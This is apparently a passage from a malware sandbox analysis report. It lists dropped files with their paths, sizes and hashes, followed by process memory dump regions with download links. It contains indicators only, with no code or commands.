ca71a18d8a696031c016434de89c7a158e3a6052

SHA256
74cd8cebc022b06c2cb58d00eb7d4dedaa47442bd7011130302785a3533c03ae

SHA512
20012378e6c05e27c79baad9c76dad237ecdb154bd638df87ad69fbfba5f03880bd1501edfcf71002b45e6d351acf96d32dc7548c0c57dd4fa7ea730ddebf540

Download Submit
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe

Filesize
5.4MB

MD5
ad08fb264dd83251bebda5b2c71871f0

SHA1
ca71a18d8a696031c016434de89c7a158e3a6052

SHA256
74cd8cebc022b06c2cb58d00eb7d4dedaa47442bd7011130302785a3533c03ae

SHA512
20012378e6c05e27c79baad9c76dad237ecdb154bd638df87ad69fbfba5f03880bd1501edfcf71002b45e6d351acf96d32dc7548c0c57dd4fa7ea730ddebf540

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\index.html

Filesize
1KB

MD5
12cf60e57791e7a8bd78033c9f308931

SHA1
f6c8a295064f7fa8553295e3cd8a9c62352f7c2c

SHA256
2f9f2fe135d66c296ab6071d01529623bac31d4a63ab073be3c6c1e20d34f50a

SHA512
72735d76803980afe7260d713a377f82316fa24109f1d2767b352984aa53d4a5e441a89d99aa3fdb32042dcb61b43d88465272bc98552892747829d7986cf3b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\logo.png

Filesize
2KB

MD5
561a5a310ac6505c1dc2029a61632617

SHA1
f267ab458ec5d0f008a235461e466b1fd3ed14ee

SHA256
b41bd7c17b6bdfe6ae0d0dbbb5ce92fd38c4696833ae3333a1d81cf7e38d6e35

SHA512
4edb7ef8313e20bbc73fd96207c2076ce3bac0754a92bb00aff0259ffe1adf6f7e4d6917e7815fd643139a08bd4a0f325f66982378f94483ce1ee0924df6d3c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\qrcode.png

Filesize
1KB

MD5
abcf7fd62d78b302475bac66fd1e2968

SHA1
fad0de7476d1cb563ffd3723dfc8f6dc9d7fbac4

SHA256
741a816750ffd35e3c4828cca24e90ffad946e040e11eca3c4a2ec2a1c74def4

SHA512
323492e5b069e0544baa81ea5e1c4b693a5068f55cc20e678672abff55847af48c63e48a13ca8b8908f2defee4654f42941e7f93b5a26775a971bdf186db21ba

Download Submit
memory/464-266-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/464-272-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/464-268-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/1428-215-0x0000023972080000-0x00000239720A2000-memory.dmp

Filesize
136KB

Download
memory/1428-226-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/1428-245-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/1428-247-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/1428-228-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/1428-227-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/1428-246-0x00000239720B0000-0x00000239720C0000-memory.dmp

Filesize
64KB

Download
memory/2820-233-0x0000000000400000-0x0000000000698000-memory.dmp

Filesize
2.6MB

Download
memory/2820-206-0x00000000007F0000-0x0000000000832000-memory.dmp

Filesize
264KB

Download
memory/3768-185-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/3768-146-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/3804-256-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

Filesize
4KB

Download
memory/3804-257-0x0000000002AD0000-0x0000000002AD1000-memory.dmp

Filesize
4KB

Download
memory/3804-255-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/3804-254-0x0000000002850000-0x0000000002851000-memory.dmp

Filesize
4KB

Download
memory/3804-253-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

Filesize
4KB

Download
memory/3804-259-0x0000000000400000-0x0000000000D4A000-memory.dmp

Filesize
9.3MB

Download
memory/3804-252-0x0000000000D90000-0x0000000000D91000-memory.dmp

Filesize
4KB

Download
memory/3804-258-0x0000000002AE0000-0x0000000002AE1000-memory.dmp

Filesize
4KB

Download
memory/4028-187-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4028-133-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4112-151-0x00000000006E0000-0x0000000000786000-memory.dmp

Filesize
664KB

Download
memory/4112-157-0x000000001B3D0000-0x000000001B3E0000-memory.dmp

Filesize
64KB

Download
memory/4144-189-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-191-0x000000001B600000-0x000000001B69C000-memory.dmp

Filesize
624KB

Download
memory/4144-231-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-229-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-188-0x00000000004F0000-0x0000000000560000-memory.dmp

Filesize
448KB

Download
memory/4144-194-0x000000001BD40000-0x000000001BDA6000-memory.dmp

Filesize
408KB

Download
memory/4144-190-0x000000001C3A0000-0x000000001C86E000-memory.dmp

Filesize
4.8MB

Download
memory/4144-232-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-192-0x0000000000D10000-0x0000000000D18000-memory.dmp

Filesize
32KB

Download
memory/4144-193-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-198-0x00000000209B0000-0x0000000020A12000-memory.dmp

Filesize
392KB

Download
memory/4144-197-0x000000001FCE0000-0x000000001FFEE000-memory.dmp

Filesize
3.1MB

Download
memory/4144-196-0x0000000000E30000-0x0000000000E40000-memory.dmp

Filesize
64KB

Download
memory/4144-195-0x000000001BDB0000-0x000000001BE0E000-memory.dmp

Filesize
376KB

Download